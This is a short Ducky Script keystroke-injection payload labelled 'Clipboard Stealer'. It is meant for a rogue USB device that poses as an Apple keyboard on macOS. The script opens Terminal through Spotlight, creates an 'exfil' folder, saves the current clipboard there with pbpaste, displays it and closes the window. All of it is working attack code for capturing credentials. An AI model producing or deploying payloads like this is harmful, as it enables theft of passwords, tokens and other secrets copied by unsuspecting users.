REM Author: Generated
REM Title: Clipboard Stealer
REM Target: macOS
REM Version: 1.0
REM Category: Credentials
REM ---
DELAY 1000
REM Capture current clipboard contents
REM Saves to ~/Documents/exfil/clipboard.txt
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil
ENTER
DELAY 500
STRING pbpaste > ~/Documents/exfil/clipboard.txt
ENTER
DELAY 500
STRING cat ~/Documents/exfil/clipboard.txt
ENTER
DELAY 1000
GUI w
